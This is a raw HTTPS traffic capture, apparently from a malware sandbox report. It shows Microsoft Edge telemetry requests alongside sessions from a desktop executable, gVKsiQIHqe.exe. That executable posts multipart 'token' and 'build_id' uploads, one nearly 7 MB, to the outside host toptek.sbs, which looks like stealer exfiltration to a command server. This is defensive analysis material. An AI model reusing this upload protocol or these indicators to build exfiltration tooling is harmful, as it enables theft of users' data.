                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=dbe504bc11824d96821072a812ec1db3&HASH=dbe5&LV=202412&V=4&LU=1734933484738; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:58:04 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=94ca4a41cc11405b9fb0cbaab7ebe03b; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 06:28:04 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 2704
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:04 GMT
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    35192.168.2.54989718.164.116.394437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:04 UTC1012OUTGET /b2?rn=1734933482036&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1527A764E6A86BDB2DE6B23AE7AF6A4B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: UID=1B5aaed1ef292e4cd07b08d1734933482; XID=1B5aaed1ef292e4cd07b08d1734933482
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:05 GMT
                                                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                    Via: 1.1 7bf47dc1c691ee43f7c8db83aa03a3cc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: JFK50-P6
                                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: hGskPmrhQBFHeIhBDSSe_zt05LhycUK0Pp2aYYwDqImPbSgFwA6QSw==


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    36192.168.2.54990394.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----6XLN7YM7GVAIM7GDJ5XT
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 6990993
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 36 58 4c 4e 37 59 4d 37 47 56 41 49 4d 37 47 44 4a 35 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 36 58 4c 4e 37 59 4d 37 47 56 41 49 4d 37 47 44 4a 35 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 36 58 4c 4e 37 59 4d 37 47 56 41 49 4d 37 47 44 4a 35 58 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------6XLN7YM7GVAIM7GDJ5XTContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------6XLN7YM7GVAIM7GDJ5XTContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------6XLN7YM7GVAIM7GDJ5XTCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:12 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    37192.168.2.54990520.110.205.1194437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC1261OUTGET /c.gif?rnd=1734933482036&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=0e7012095d61412c88f16ab8ae837c65&activityId=0e7012095d61412c88f16ab8ae837c65&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=63FAA190F2474AB080F91B05DE1E2DE2&MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: c.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B; _EDGE_S=F=1&SID=274477A862C669B72E1F62F6631E6834; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:06 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                    P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                    Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B; domain=.msn.com; expires=Sat, 17-Jan-2026 05:58:05 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                    Set-Cookie: SRM_M=1527A764E6A86BDB2DE6B23AE7AF6A4B; domain=c.msn.com; expires=Sat, 17-Jan-2026 05:58:05 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 30-Dec-2024 05:58:05 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 23-Dec-2024 06:08:05 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:05 GMT
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Content-Length: 42
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:06 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    38192.168.2.54991894.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:06 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----TR9Z5XBSR1N7YU3OPPZ5
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:06 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 54 52 39 5a 35 58 42 53 52 31 4e 37 59 55 33 4f 50 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 54 52 39 5a 35 58 42 53 52 31 4e 37 59 55 33 4f 50 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 54 52 39 5a 35 58 42 53 52 31 4e 37 59 55 33 4f 50 50 5a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------TR9Z5XBSR1N7YU3OPPZ5Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------TR9Z5XBSR1N7YU3OPPZ5Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------TR9Z5XBSR1N7YU3OPPZ5Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
